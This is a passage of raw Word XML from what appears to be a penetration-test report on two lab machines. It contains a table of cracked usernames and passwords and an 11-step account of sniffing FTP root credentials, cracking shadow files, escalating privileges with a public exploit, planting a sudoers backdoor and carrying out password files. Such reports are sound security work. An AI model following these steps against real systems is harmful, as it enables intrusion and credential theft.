          </w:tcPr>
          <w:p w14:paraId="5DCC2508" w14:textId="27A35DE2" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="7BB59BF0" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="2677C3AB" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="1A83FCDA" w14:textId="02CC68A2" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>663/udp (unknown)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="01F14FBC" w14:textId="62C12B34" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="218C8284" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="50F7A258" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B9A4D10" w14:textId="76D6CE63" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>666/udp (doom)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0039B4" w14:textId="5C95328D" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="46B2B5DC" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4674703D" w14:textId="77777777" w:rsidR="00D644ED" w:rsidRDefault="00D644ED" w:rsidP="00D644ED"/>
    <w:p w14:paraId="2119A4C3" w14:textId="6FD28FF9" w:rsidR="00F45D43" w:rsidRDefault="00F45D43" w:rsidP="00F45D43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Harvested passwords were as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05185B" w14:textId="1D649224" w:rsidR="00B66E87" w:rsidRPr="00B66E87" w:rsidRDefault="00B66E87" w:rsidP="00B66E87">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc422058348"/>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AB13BF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Harvested Passwords</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1024"/>
        <w:gridCol w:w="1167"/>
        <w:gridCol w:w="1210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00213A4C" w:rsidRPr="00213A4C" w14:paraId="609FA98D" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24FFCC26" w14:textId="3EAF328E" w:rsidR="00213A4C" w:rsidRPr="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213A4C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044790F2" w14:textId="62335A7C" w:rsidR="00213A4C" w:rsidRPr="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213A4C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48903DCC" w14:textId="67232C46" w:rsidR="00213A4C" w:rsidRPr="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213A4C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213A4C" w14:paraId="3632088F" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68387C62" w14:textId="4B66627B" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A08A699" w14:textId="22C710B0" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18EC241C" w14:textId="2728CA6B" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213A4C" w14:paraId="395A53A8" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="387F2D3E" w14:textId="6AFA93A6" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F76E75" w14:textId="3892026D" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C552432" w14:textId="62EA20D1" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213A4C" w:rsidRPr="0072623E" w14:paraId="7DC9B41A" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5948150F" w14:textId="29FF4350" w:rsidR="00213A4C" w:rsidRPr="0072623E" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5CC47B" w14:textId="08AC310F" w:rsidR="00213A4C" w:rsidRPr="0072623E" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AEA68F8" w14:textId="4ED3E35C" w:rsidR="00213A4C" w:rsidRPr="0072623E" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>sniper01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213A4C" w14:paraId="24B56EA1" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0F4A9F" w14:textId="40C61F37" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BAE954B" w14:textId="50E2C83E" w:rsidR="00213A4C" w:rsidRDefault="00213A4C" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A24ECA" w14:textId="31C625E0" w:rsidR="00213A4C" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>digital</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00D37" w14:paraId="6EF8E8C2" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F61E8C2" w14:textId="4A40DE33" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A2B4540" w14:textId="1344BDB9" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790C7BDE" w14:textId="4F2F2D0F" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00D37" w14:paraId="58865128" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E065715" w14:textId="500C802F" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34479D2B" w14:textId="5FE083E5" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A653A9C" w14:textId="4330D42A" w:rsidR="00A00D37" w:rsidRDefault="00A00D37" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00D37" w:rsidRPr="0072623E" w14:paraId="2395A387" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33E4473F" w14:textId="4804C688" w:rsidR="00A00D37" w:rsidRPr="0072623E" w:rsidRDefault="0072623E" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="578DFBF3" w14:textId="7A411DA1" w:rsidR="00A00D37" w:rsidRPr="0072623E" w:rsidRDefault="0072623E" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D077EBA" w14:textId="75EE2776" w:rsidR="00A00D37" w:rsidRPr="0072623E" w:rsidRDefault="0072623E" w:rsidP="00596A33">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072623E">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>moon458$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52C900EC" w14:textId="413C74C0" w:rsidR="00213A4C" w:rsidRDefault="00F45D43" w:rsidP="00F45D43">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc422058356"/>
      <w:r>
        <w:t>Attack Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4B7BB5AE" w14:textId="35009A7F" w:rsidR="00E027AD" w:rsidRDefault="00E027AD" w:rsidP="00F45D43">
      <w:r>
        <w:t>Full compromise of the two</w:t>
      </w:r>
      <w:r w:rsidR="00713B88">
        <w:t xml:space="preserve"> targets was accomplished in 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5B311" w14:textId="6DF5E4F2" w:rsidR="00E027AD" w:rsidRDefault="00E027AD" w:rsidP="00E027AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We harvested cptvm2 root credentials simply by observing network traffic via Wireshark.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">An FTP connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>using root credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was being established from cptvm1 to cptvm2 every 40 seconds. This permitted easy harvesting of the root credentials since FTP is a plaintext protocol.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E41886" w14:textId="0D5CFEDE" w:rsidR="00E027AD" w:rsidRDefault="00E027AD" w:rsidP="00E027AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>With cptvm2 root credentials in hand and with an FTP server already running on cptvm2, the passwd and shadow files were obtained simply by FTPing from our attack machine to cptvm2 and GETing the files.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA544E" w14:textId="2337D5A3" w:rsidR="00E027AD" w:rsidRDefault="00E027AD" w:rsidP="00E027AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The password cracking program “John the Ripper” was used to harvest credentials for two more user accounts on cptvm2. These accounts were named “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E027AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cptvm1</w:t>
      </w:r>
      <w:r>
        <w:t>” and “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E027AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cptvm2</w:t>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="0087036A">
        <w:t xml:space="preserve"> Both of these credentials were found to also be in use on cptvm1. This gave us unprivileged access to cptvm1.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA6095" w14:textId="7B02F770" w:rsidR="00E027AD" w:rsidRDefault="0087036A" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A suitable local privilege elevation exploit was found for cptvm1 by Googling “</w:t>
      </w:r>
      <w:r w:rsidRPr="0087036A">
        <w:t>linux 2.4 privilege elevation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”. Specifically, we used exploit #778 (“uselib()”) from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00822BE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/778/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> database.</w:t>
      </w:r>
      <w:r w:rsidR="00A178D9">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB7102" w14:textId="03DE5F54" w:rsidR="00A178D9" w:rsidRDefault="00A178D9" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cptvm1 was also running an FTP server. This gave us an easy way to transfer th</w:t>
      </w:r>
      <w:r w:rsidR="00BF3660">
        <w:t>e exploit source code to cptvm1</w:t>
      </w:r>
      <w:r w:rsidR="00F73386">
        <w:t>, whi</w:t>
      </w:r>
      <w:r w:rsidR="00BF3660">
        <w:t>ch we did.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B342A" w14:textId="7E0C71E3" w:rsidR="00A178D9" w:rsidRDefault="00D43069" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using account “cptvm1” on target cptvm1 (whose password we harvested in step 3), we built the exploit.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D7132" w14:textId="1EBD43E4" w:rsidR="00D43069" w:rsidRDefault="00D43069" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After several runs of the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00696B1F">
        <w:t xml:space="preserve"> (also using account “cptvm1”)</w:t>
      </w:r>
      <w:r>
        <w:t>, we obtained root access on cptvm1.</w:t>
      </w:r>
      <w:r w:rsidR="002E7DA5">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2470F" w14:textId="463BF88E" w:rsidR="002E7DA5" w:rsidRDefault="002E7DA5" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We next used “visudo” to give root privileges to user “cptvm1”</w:t>
      </w:r>
      <w:r w:rsidR="00A520D9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thereby ensuring we would have continued root access to cptvm1. (But as it turned out, </w:t>
      </w:r>
      <w:r w:rsidR="00A520D9">
        <w:t>we only one root session was needed.)</w:t>
      </w:r>
      <w:r w:rsidR="00A520D9">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A131C" w14:textId="25055615" w:rsidR="00A520D9" w:rsidRDefault="00EC3628" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We copied the passwd and shadow files to the home directory of user “cptvm1” and used “chmod” to make them readable by everybody (they are normally readable only by root).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C9D24" w14:textId="23F4C661" w:rsidR="00EC3628" w:rsidRDefault="00EC3628" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We used cptvm1’s running FTP server once more to move the passwd and shadow files from cptvm1 to our attack machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB2CE0" w14:textId="448A5C93" w:rsidR="00583CCD" w:rsidRDefault="00EC3628" w:rsidP="0087036A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We used “John the Ripper”</w:t>
      </w:r>
      <w:r w:rsidR="000328A1">
        <w:t xml:space="preserve"> again, this time to harvest cpt</w:t>
      </w:r>
      <w:r>
        <w:t>vm1’s root password (as well as one other account named “user”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B3EB0" w14:textId="231AE63C" w:rsidR="00EC3628" w:rsidRDefault="00583CCD" w:rsidP="00583CCD">
      <w:r>
        <w:t>Screenshots showing each of these steps follow.</w:t>
      </w:r>
      <w:r w:rsidR="004363E5">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CBDD73" w14:textId="77777777" w:rsidR="00E4789C" w:rsidRDefault="00E4789C" w:rsidP="000C42AC">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00E4789C" w:rsidSect="009F0749">
          <w:footerReference w:type="default" r:id="rId12"/>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pPr>
    </w:p>
    <w:p w14:paraId="7F31DAAE" w14:textId="77777777" w:rsidR="00274C21" w:rsidRDefault="007D5E7E" w:rsidP="00274C21">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
